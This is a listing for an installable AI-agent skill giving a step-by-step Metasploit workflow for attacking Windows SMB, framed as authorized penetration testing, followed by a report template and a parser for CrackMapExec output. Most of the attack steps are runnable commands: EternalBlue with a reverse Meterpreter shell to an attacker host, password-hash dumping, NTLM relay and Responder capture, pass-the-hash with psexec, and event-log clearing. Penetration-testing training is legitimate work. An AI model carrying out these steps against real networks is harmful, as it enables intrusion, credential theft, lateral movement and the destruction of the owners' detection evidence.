exploiting-smb-vulnerabilities-with-metasploit
Identifies and exploits SMB protocol vulnerabilities using Metasploit Framework during authorized penetration tests to demonstrate risks from unpatched Windows systems, misconfigured shares, and weak authentication in enterprise networks.
Best use case
exploiting-smb-vulnerabilities-with-metasploit is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
Teams using exploiting-smb-vulnerabilities-with-metasploit should expect a more consistent output, faster repeated execution, less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in `.claude/skills/exploiting-smb-vulnerabilities-with-metasploit/SKILL.md` inside your project
- Restart your AI agent; it will auto-discover the skill
How exploiting-smb-vulnerabilities-with-metasploit Compares
| Feature / Agent | exploiting-smb-vulnerabilities-with-metasploit | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
Identifies and exploits SMB protocol vulnerabilities using Metasploit Framework during authorized penetration tests to demonstrate risks from unpatched Windows systems, misconfigured shares, and weak authentication in enterprise networks.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
SKILL.md Source
# Exploiting SMB Vulnerabilities with Metasploit

## When to Use

- Testing Windows systems for critical SMB-reachable vulnerabilities (EternalBlue, EternalRomance, PrintNightmare) during authorized penetration tests
- Demonstrating lateral movement risks via SMB relay, pass-the-hash, and credential spraying
- Validating that patch management processes have addressed known SMB vulnerabilities
- Assessing SMB signing enforcement and share permission configurations across the domain
- Testing network segmentation by attempting SMB exploitation across VLAN boundaries

**Do not use** against systems without explicit written authorization, against production domain controllers without a maintenance window, or to deploy persistent backdoors beyond the scope of the assessment.

## Prerequisites

- Metasploit Framework 6.x installed (`msfconsole --version`)
- Authorized penetration test scope document listing target IP ranges and approved attack types
- Network access to target SMB services (TCP 445, TCP 139)
- CrackMapExec and Impacket tools installed for complementary SMB testing
- Valid test credentials or credential wordlists approved for the engagement
- Kali Linux or equivalent testing platform

## Workflow

### Step 1: Enumerate SMB Services and Versions

```bash
# Discover hosts with SMB open using Nmap (-sS requires root)
sudo nmap -sS -p 445,139 --open -oA smb_hosts 10.10.0.0/24

# -oA writes .nmap/.gnmap/.xml, not a .txt; build the plain host list that
# later "set RHOSTS file:..." lines consume from the greppable output
grep '445/open' smb_hosts.gnmap | awk '{print $2}' | sort -u > smb_hosts.txt

# Enumerate SMB versions and OS information
nmap -sV -p 445 --script smb-os-discovery,smb-protocols -oA smb_enum 10.10.0.0/24

# Rapid SMB enumeration with CrackMapExec. The default banner line printed for
# each host already ends in (signing:True|False) and (SMBv1:True|False), so
# signing status needs no extra flag; --gen-relay-list additionally writes the
# hosts that do not require signing (the relay targets) to a file
crackmapexec smb 10.10.0.0/24 --gen-relay-list smb_nosigning.txt

# Enumerate shares with null session
crackmapexec smb 10.10.0.0/24 -u '' -p '' --shares
```

### Step 2: Scan for Known SMB Vulnerabilities

```bash
# Start Metasploit and scan for MS17-010 (EternalBlue)
msfconsole -q
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(smb_ms17_010) > set RHOSTS file:smb_hosts.txt
msf6 auxiliary(smb_ms17_010) > set THREADS 10
msf6 auxiliary(smb_ms17_010) > run

# Check for MS08-067 (Conficker vulnerability). Metasploit has no separate
# scanner module for it; use the exploit module's check command, or Nmap's
# smb-vuln-ms08-067 script
msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(ms08_067_netapi) > set RHOSTS file:smb_hosts.txt
msf6 exploit(ms08_067_netapi) > check
nmap -p 445 --script smb-vuln-ms08-067 10.10.0.0/24

# Check for SMBGhost (CVE-2020-0796). smb-vuln-cve-2020-0796 is a community
# NSE script that is not shipped with Nmap: copy it into the scripts directory
# and run `nmap --script-updatedb` before using it
nmap -p 445 --script smb-vuln-cve-2020-0796 10.10.0.0/24

# Check for PrintNightmare (CVE-2021-34527) with an approved domain account
crackmapexec smb 10.10.0.0/24 -u testuser -p 'TestPass123' -M printnightmare
```

### Step 3: Exploit EternalBlue (MS17-010)

```bash
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 10.10.5.23
msf6 exploit(ms17_010_eternalblue) > set LHOST 10.10.1.99
msf6 exploit(ms17_010_eternalblue) > set LPORT 4444
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
# The kernel-pool grooming is unreliable; cap retries so a failing target is
# not crashed repeatedly
msf6 exploit(ms17_010_eternalblue) > set MaxExploitAttempts 3
msf6 exploit(ms17_010_eternalblue) > exploit

# Post-exploitation: verify access level
meterpreter > getuid
# Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
meterpreter > ipconfig
meterpreter > hashdump
```

### Step 4: Perform SMB Relay Attack

```bash
# Relay targets are the hosts without SMB signing (smb_nosigning.txt from Step 1).
# Set up NTLM relay with Impacket; -i opens an interactive SMB client on a
# local port for each successful relay instead of running a command
sudo impacket-ntlmrelayx -tf smb_nosigning.txt -smb2support -i

# Trigger authentication from a compromised host or via phishing.
# From a Meterpreter session on a compromised host:
meterpreter > shell
C:\> net use \\10.10.1.99\share /user:DOMAIN\admin password

# Or use Metasploit's SMB relay module
msf6 > use exploit/windows/smb/smb_relay
msf6 exploit(smb_relay) > set SMBHOST 10.10.5.30
msf6 exploit(smb_relay) > set LHOST 10.10.1.99
msf6 exploit(smb_relay) > exploit

# Use Responder to capture NetNTLMv2 challenge/responses for offline cracking
# (these cannot be passed-the-hash, only cracked or relayed). When Responder
# and ntlmrelayx run on the same host, set SMB = Off and HTTP = Off in
# Responder.conf first, or the two fight over ports 445 and 80
sudo responder -I eth0 -wrfv
```

### Step 5: Pass-the-Hash and Lateral Movement via SMB

```bash
# Extract hashes from compromised system (pwdump format: user:rid:LM:NT:::)
meterpreter > hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::

# Use pass-the-hash with CrackMapExec (the NT half alone is enough)
crackmapexec smb 10.10.0.0/24 -u Administrator \
  -H e19ccf75ee54e06b06a5907af13cef42 --shares

# Execute commands via pass-the-hash
crackmapexec smb 10.10.5.30 -u Administrator \
  -H e19ccf75ee54e06b06a5907af13cef42 -x "whoami && hostname"

# Use Impacket psexec for an interactive shell (LM:NT form)
impacket-psexec Administrator@10.10.5.30 \
  -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

# Use Metasploit psexec module; SMBPass accepts the LM:NT pair directly
msf6 > use exploit/windows/smb/psexec
msf6 exploit(psexec) > set RHOSTS 10.10.5.30
msf6 exploit(psexec) > set SMBUser Administrator
msf6 exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
msf6 exploit(psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(psexec) > set LHOST 10.10.1.99
msf6 exploit(psexec) > exploit
```

### Step 6: Document Findings and Clean Up

```bash
# Document all compromised systems and access levels.
# In Meterpreter, screenshot desktops for evidence
meterpreter > screenshot

# List accessible shares and sensitive data
meterpreter > shell
C:\> net share
C:\> dir \\10.10.5.30\C$\Users\ /s /b

# Clean up: remove the artifacts you dropped. Keep a record of every file your
# payloads wrote (Metasploit's psexec service binary gets a random name), and
# only clear event logs if the rules of engagement explicitly allow it; doing
# so destroys the client's own detection evidence
meterpreter > clearev
meterpreter > shell
C:\> del /f C:\Windows\Temp\payload.exe

# Close all sessions
msf6 > sessions -K

# Verify cleanup
crackmapexec smb 10.10.5.23 -u Administrator -H <hash> -x "dir C:\Windows\Temp\payload*"
```

## Key Concepts

| Term | Definition |
|------|------------|
| **EternalBlue (MS17-010)** | Critical vulnerability in SMBv1 allowing remote code execution as SYSTEM without authentication; the exploit was developed by the NSA and leaked by the Shadow Brokers |
| **SMB Signing** | Cryptographic signing of SMB packets to prevent tampering and relay attacks; when not required, attackers can relay NTLM authentication to other SMB hosts |
| **Pass-the-Hash** | Authentication technique using captured NTLM password hashes directly instead of plaintext passwords, bypassing the need to crack the hash |
| **NTLM Relay** | Attack where captured NTLM authentication is forwarded to a different server in real time, granting the attacker access as the relayed user |
| **PsExec** | Remote execution technique that uploads a service binary to the ADMIN$ share and creates a Windows service to execute commands as SYSTEM |
| **Null Session** | Anonymous SMB connection (empty username and password) that may expose share listings, user enumeration, and policy information on misconfigured systems |

## Tools & Systems

- **Metasploit Framework**: Exploitation framework with dedicated SMB scanner, exploit, and post-exploitation modules for comprehensive SMB testing
- **CrackMapExec**: Swiss-army knife for SMB enumeration, credential testing, share enumeration, and command execution across Windows networks
- **Impacket**: Python library providing psexec, smbclient, ntlmrelayx, and other tools for low-level SMB protocol interaction
- **Responder**: LLMNR/NBT-NS/mDNS poisoner that captures NetNTLM challenge/responses from Windows name resolution fallback behavior
- **enum4linux-ng**: Updated SMB enumeration tool for extracting users, groups, shares, and policies from Windows/Samba hosts

## Common Scenarios

### Scenario: Internal Penetration Test Targeting Windows Domain via SMB

**Context**: During an internal penetration test for a financial services firm, the tester has network access to the corporate VLAN (10.10.0.0/16). The scope includes testing all Windows servers and workstations for SMB-related vulnerabilities. The Active Directory domain is CORP.EXAMPLE.COM with approximately 200 hosts.

**Approach**:

1. Scan the entire /16 for open SMB ports and enumerate OS versions with CrackMapExec
2. Identify 12 hosts running Windows Server 2012 R2 without the MS17-010 patch applied
3. Exploit EternalBlue on a non-critical file server (10.10.5.23) to gain SYSTEM access
4. Extract the local Administrator password hash using hashdump and discover password reuse across 47 hosts
5. Use pass-the-hash to access a domain controller, extracting the NTDS.dit database
6. Demonstrate that SMB signing is not required on 83% of hosts, enabling relay attacks
7. Document the complete attack chain showing how one unpatched system led to full domain compromise

**Pitfalls**:

- The EternalBlue exploit can cause a blue screen of death (BSOD) on the target, especially on older or unstable systems
- Running psexec on heavily monitored endpoints may trigger EDR alerts and burn the engagement
- Performing hashdump on domain controllers with large databases can cause performance degradation
- Not checking for SMBv1 explicitly; some scanners miss it when SMBv2/v3 is also available

## Output Format

```
## SMB Vulnerability Assessment Report

**Engagement**: Internal Penetration Test
**Target Range**: 10.10.0.0/16 (CORP.EXAMPLE.COM)
**SMB Hosts Discovered**: 187

### Critical Findings

**Finding 1: MS17-010 (EternalBlue) - 12 Unpatched Hosts**
- Severity: Critical (CVSS 9.8)
- Affected: 10.10.5.23, 10.10.5.24, 10.10.8.10 (+ 9 others)
- Impact: Remote code execution as SYSTEM without authentication
- Exploited: Yes - gained SYSTEM on 10.10.5.23
- Remediation: Apply MS17-010 patch, disable SMBv1

**Finding 2: SMB Signing Not Required - 155/187 Hosts**
- Severity: High (CVSS 7.5)
- Impact: NTLM relay attacks allow credential forwarding
- Exploited: Yes - relayed domain admin credentials
- Remediation: Require SMB signing via Group Policy

**Finding 3: Local Admin Password Reuse - 47 Hosts**
- Severity: High (CVSS 7.2)
- Impact: Compromise of one host enables lateral movement to 47 systems
- Remediation: Deploy LAPS (Local Administrator Password Solution)
```
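Step 1 leans on the per-host banner that `crackmapexec smb` prints, and the scenario later turns that output into a relay list, an SMBv1 host list for the MS17-010 scanner, and the "signing not required on 83% of hosts" figure. The script below is an added example, not code from the skill or from CrackMapExec, that parses those banner lines offline and derives the three artifacts. The sample output it contains is constructed for the example; its IPs, host names and domain are hypothetical.

```python
"""Triage CrackMapExec SMB banner output into relay targets, SMBv1 hosts
and a signing-coverage figure.

Added example, not part of the original skill. `crackmapexec smb <range>`
prints one banner line per host ending in (signing:True|False) and, on
recent builds, (SMBv1:True|False). The sample below is constructed; the
hosts do not exist.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of CME output (not captured from a real network). The
# last line is a login result, not a banner, and must be ignored.
SAMPLE_CME_OUTPUT = """\
SMB         10.10.5.23      445    FILESRV01        [*] Windows Server 2012 R2 Standard 9600 x64 (name:FILESRV01) (domain:CORP) (signing:False) (SMBv1:True)
SMB         10.10.5.30      445    APPSRV02         [*] Windows Server 2016 Standard 14393 x64 (name:APPSRV02) (domain:CORP) (signing:False) (SMBv1:False)
SMB         10.10.1.5       445    DC01             [*] Windows Server 2019 Standard 17763 x64 (name:DC01) (domain:CORP) (signing:True) (SMBv1:False)
SMB         10.10.8.10      445    WS-ACCT-07       [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:WS-ACCT-07) (domain:CORP) (signing:False) (SMBv1:True)
SMB         10.10.8.11      445    WS-ACCT-08       [*] Windows 10 Pro 19041 x64 (name:WS-ACCT-08) (domain:CORP) (signing:False) (SMBv1:False)
SMB         10.10.5.23      445    FILESRV01        [+] CORP\\testuser:TestPass123
"""

# Banner lines start with "SMB <ip> <port> <host> [*] <os> (name:..) (domain:..)
# (signing:..)" and optionally "(SMBv1:..)"; anything else is skipped.
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+"
    r"(?P<os>.+?)\s+\(name:[^)]*\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)(?:\s+\(SMBv1:(?P<smbv1>True|False)\))?"
)


@dataclass(frozen=True)
class SmbHost:
    ip: str
    hostname: str
    domain: str
    os: str
    signing_required: bool
    smbv1: Optional[bool]  # None when the CME build did not report the flag


def parse_cme_banners(text: str) -> List[SmbHost]:
    """One SmbHost per banner line; duplicates (rescans) and non-banner lines
    such as login results or module output are dropped."""
    hosts: List[SmbHost] = []
    seen = set()
    for line in text.splitlines():
        m = BANNER_RE.match(line)
        if not m or m.group("ip") in seen:
            continue
        seen.add(m.group("ip"))
        smbv1 = m.group("smbv1")
        hosts.append(SmbHost(
            ip=m.group("ip"), hostname=m.group("host"), domain=m.group("domain"),
            os=m.group("os"), signing_required=(m.group("signing") == "True"),
            smbv1=None if smbv1 is None else smbv1 == "True"))
    return hosts


def relay_targets(hosts: List[SmbHost]) -> List[str]:
    """Hosts that do not require signing: the list ntlmrelayx -tf expects,
    i.e. what --gen-relay-list writes."""
    return [h.ip for h in hosts if not h.signing_required]


def smbv1_hosts(hosts: List[SmbHost]) -> List[str]:
    """Hosts still answering SMBv1: the candidates for smb_ms17_010."""
    return [h.ip for h in hosts if h.smbv1]


def smbv1_unknown(hosts: List[SmbHost]) -> List[str]:
    """Hosts whose banner lacked the SMBv1 flag; re-check them explicitly
    (nmap --script smb-protocols) instead of assuming SMBv1 is off."""
    return [h.ip for h in hosts if h.smbv1 is None]


def signing_disabled_pct(hosts: List[SmbHost]) -> float:
    """Share of SMB hosts not requiring signing, for the report summary."""
    return round(100.0 * len(relay_targets(hosts)) / len(hosts), 1) if hosts else 0.0


if __name__ == "__main__":
    found = parse_cme_banners(SAMPLE_CME_OUTPUT)
    print(f"{len(found)} SMB hosts parsed")
    print(f"signing not required on {signing_disabled_pct(found)}%: {relay_targets(found)}")
    print(f"SMBv1 enabled (run smb_ms17_010 against these): {smbv1_hosts(found)}")
    print(f"SMBv1 status unknown, re-check: {smbv1_unknown(found)}")
```

Run it against `crackmapexec smb 10.10.0.0/16 | tee cme_smb.txt` output by replacing the constructed sample with the file contents; the relay list can be written straight to the `-tf` file for ntlmrelayx. The `smbv1_unknown` list exists because of the pitfall above: a host that never reported the flag is not a host with SMBv1 disabled.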
Related Skills
triaging-vulnerabilities-with-ssvc-framework
Triage and prioritize vulnerabilities using CISA's Stakeholder-Specific Vulnerability Categorization (SSVC) decision tree framework to produce actionable remediation priorities.
testing-for-xxe-injection-vulnerabilities
Discovering and exploiting XML External Entity injection vulnerabilities to read server files, perform SSRF, and exfiltrate data during authorized penetration tests.
testing-for-xss-vulnerabilities
Tests web applications for Cross-Site Scripting (XSS) vulnerabilities by injecting JavaScript payloads into reflected, stored, and DOM-based contexts to demonstrate client-side code execution, session hijacking, and user impersonation. The tester identifies all injection points and output contexts, crafts context-appropriate payloads, and bypasses sanitization and CSP protections. Activates for requests involving XSS testing, cross-site scripting assessment, client-side injection testing, or JavaScript injection vulnerability testing.
testing-for-xss-vulnerabilities-with-burpsuite
Identifying and validating cross-site scripting vulnerabilities using Burp Suite's scanner, intruder, and repeater tools during authorized security assessments.
testing-for-xml-injection-vulnerabilities
Test web applications for XML injection vulnerabilities including XXE, XPath injection, and XML entity attacks to identify data exposure and server-side request forgery risks.
testing-for-open-redirect-vulnerabilities
Identify and test open redirect vulnerabilities in web applications by analyzing URL redirection parameters, bypass techniques, and exploitation chains for phishing and token theft.
testing-for-json-web-token-vulnerabilities
Test JWT implementations for critical vulnerabilities including algorithm confusion, none algorithm bypass, kid parameter injection, and weak secret exploitation to achieve authentication bypass and privilege escalation.
testing-for-business-logic-vulnerabilities
Identifying flaws in application business logic that allow price manipulation, workflow bypass, and privilege escalation beyond what technical vulnerability scanners can detect.
testing-android-intents-for-vulnerabilities
Tests Android inter-process communication (IPC) through intents for vulnerabilities including intent injection, unauthorized component access, broadcast sniffing, pending intent hijacking, and content provider data leakage. Use when assessing Android app attack surface through exported components, testing intent-based data flows, or evaluating IPC security. Activates for requests involving Android intent security, IPC testing, exported component analysis, or Drozer assessment.
prioritizing-vulnerabilities-with-cvss-scoring
The Common Vulnerability Scoring System (CVSS) is the industry standard framework maintained by FIRST (Forum of Incident Response and Security Teams) for assessing vulnerability severity. CVSS v4.0 (r
exploiting-zerologon-vulnerability-cve-2020-1472
Exploit the Zerologon vulnerability (CVE-2020-1472) in the Netlogon Remote Protocol to achieve domain controller compromise by resetting the machine account password to empty.
exploiting-websocket-vulnerabilities
Testing WebSocket implementations for authentication bypass, cross-site hijacking, injection attacks, and insecure message handling during authorized security assessments.